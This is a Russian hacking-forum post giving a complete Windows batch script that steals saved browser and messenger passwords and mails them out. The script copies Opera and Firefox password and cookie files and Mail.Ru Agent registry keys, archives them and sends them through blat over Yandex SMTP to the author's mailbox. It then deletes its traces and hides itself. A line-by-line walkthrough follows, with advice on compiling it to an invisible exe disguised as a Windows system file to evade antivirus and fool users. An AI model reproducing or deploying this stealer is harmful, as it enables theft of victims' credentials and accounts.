Пишем вирус ворующий пароли с браузеров, отправляет все на почту
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Пишем вирус ворующий пароли с браузеров, отправляет все на почту - 2011-12-22 10:58:16.266666
|
|
|
Jamps
Сообщений: 162
Оценки: 0
Присоединился: 2011-11-30 13:37:59.140000
|
В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
@echo off
md %systemroot%\wincs
md %SystemDrive%\pass\
md %SystemDrive%\pass\opera\
md %SystemDrive%\pass\Mozilla\
md %SystemDrive%\pass\MailAgent\
md %SystemDrive%\pass\MailAgent\reg
attrib %systemroot%\wincs +h +s +r
attrib %SystemDrive%\pass +h +s +r
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"
CD /D %APPDATA%\Opera\Opera\
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat
copy /y cооkies4.dat %SystemDrive%\pass\opera\cооkies4.da
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
CD /D %APPDATA%
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
Xcopy Mra\updаtе\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul
cd %AppData%\Mozilla\Firefox\Profiles\*.default\
copy /y cооkies.sqlite %SystemDrive%\pass\Mozilla\cооkies.sqlite
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul
del /s /q %SystemRoot%\Rar.exe
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar
cd %systemroot%\wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль
ren *.rar pass.rar
%systemroot%\wincs\blat.exe -bоdу FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar
rmdir /s /q %SystemDrive%\pass
rmdir /s /q %systemroot%\wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll
del /s /q %systemroot%\blat.lib
attrib +a +s +h +r %systemroot%\wind.exe
EXIT
cls
не много распишу код самого батинка.
@echo off - скрывает тело батинка( так то она и не нужна,ну всё же)
md %systemroot%\wincs - создаёт папку wincs в системной папке windows не зависимо от того на каком диске она установлена или как она названа.
md %systemdrive%\pass\ - создаёт папку pass на диске куда установлена система windows.
md %systemdrive%\pass\opera\ - создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cооkies4.dat от браузера opera (до 11* версий опера хранит свои пароли в файле wand.dat )
md %systemdrive%\pass\mozilla\ - создаёт папку mozilla куда в дальнейшем будут копироваться файлы от браузера mozilla (cооkies.sqlite,key3.db,signons.sqlite) в которых храняться пароли.
md %systemdrive%\pass\mailagent\ - создаёт папку mailagent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра( хранящие в себе пароли) от маил агента.
md %systemdrive%\pass\mailagent\reg - создаёт папку reg
attrib %systemroot%\wincs +h +s +r - ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %systemdrive%\pass +h +s +r - тоже самое что и выше.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - копирует файл blat.exe с места выгрузки в папку wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - копирует файл blat.dll с места выгрузки в папку wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - копирует файл blat.lib с места выгрузки в папку wincs
cd /d %appdata%\opera\opera\ - переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.
copy /y wand.dat %systemdrive%\pass\opera\wand.dat - копирует файл wand.dat в папку opera
copy /y cооkies4.dat %systemdrive%\pass\opera\cооkies4.dat - копирует файл cооkies4.dat в папку opera
regedit.exe -ea %systemdrive%\pass\mailagent\reg\agent.reg "hkey_current_user\software\mail.ru\agent\magent_logins2 - экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %systemdrive%\pass\mailagent\reg\agent.reg "hkey_current_user\software\mail.ru\agent\magent_logins3 - экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
cd /d %appdata% - переходим в папку appdata
xcopy mra\base %systemdrive%\pass\mailagent /k /h /g /q /r /s /y /e >nul - копирует содержимое папки mra\base в папку mailagent
xcopy mra\updаtе\ver.txt %systemdrive%\pass\mailagent /k /h /g /q /r /s /y >nul - копирует файл ver.txt в папку mailagent
cd %appdata%\mozilla\firefox\profiles\*.default\ - переходим в папку с профилем браузера мозилы
copy /y cооkies.sqlite %systemdrive%\pass\mozilla\cооkies.sqlite - копирует файл cооkies.sqlite в папку mozilla
copy /y key3.db %systemdrive%\pass\mozilla\key3.db - копирует файл key3.db в папку mozilla
copy /y signons.sqlite %systemdrive%\pass\mozilla\signons.sqlite - копирует файл signons.sqlite в папку mozilla
copy /y %windir%\rar.exe %systemdrive%\pass\rar.exe >nul - копирует компонент архиватора winrar rar.exe в папку pass
del /s /q %systemroot%\rar.exe - удаляет компонент архиватора из папки windows
%systemdrive%\pass\rar.exe a -r %systemdrive%\pass\pass.rar %systemdrive%\pass\- архивируем содержимое папки pass
copy /y %systemdrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
cd %systemroot%\wincs - переходим в папку wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw пароль - готовит программу blat к отправки архив указывая данные для авторизации и отправки письма.не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
ren *.rar pass.rar - на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%\wincs\blat.exe -bоdу files password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar - указываем на какой почтовый адрес будет послано письмо и отсылаем его.
rmdir /s /q %systemdrive%\pass - удаляем папку pass
rmdir /s /q %systemroot%\wincs - удаляем папку wincs
del /s /q %systemroot%\blat.exe - удаляем компоненты blat из папки windows.
del /s /q %systemroot%\blat.dll - удаляем компоненты blat из папки windows.
del /s /q %systemroot%\blat.lib - удаляем компоненты blat из папки windows.
attrib +a +s +h +r %systemroot%\wind.exe - ставим на себя атрибуты тем самым скрываем себя от глаз.
exit - завершаем процесс батинка и выходим.
cls - очищаем вывод каких либо строк в интреператоре.
Компилируем в exe при помощи программы Bat To Exe Converter
Запускам его и сразу на первой вкладке выбираем опцию на Invisible application
Далее переходим на вкладку Versioninformations и указываем все данные.
Так как многие антивирусы реагируют на файлы в которых не указаны описание к файлу,я добавил описание системного файла Windows,
так что если даже и антивирус или файервол выдаст оповещение о запуске такого файла он все равно будет подписан как системный,
и юзверь в большинстве случаев даёт разрешение на выполнения такого файла,тупа приняв его за системный.
Для того что бы расшифровать пароли - программа MPR
Источник
|
|
|
|
|
|
